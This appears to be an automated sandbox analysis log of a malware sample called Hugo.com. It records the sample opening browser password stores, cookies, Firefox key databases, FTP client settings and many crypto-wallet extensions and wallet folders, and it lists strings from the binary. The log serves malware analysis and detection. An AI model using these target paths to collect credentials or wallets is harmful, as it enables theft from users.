                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Hugo.comBinary or memory string: WIN_81
                Source: Hugo.comBinary or memory string: WIN_XP
                Source: Hugo.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Hugo.comBinary or memory string: WIN_XPe
                Source: Hugo.comBinary or memory string: WIN_VISTA
                Source: Hugo.comBinary or memory string: WIN_7
                Source: Hugo.comBinary or memory string: WIN_8
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
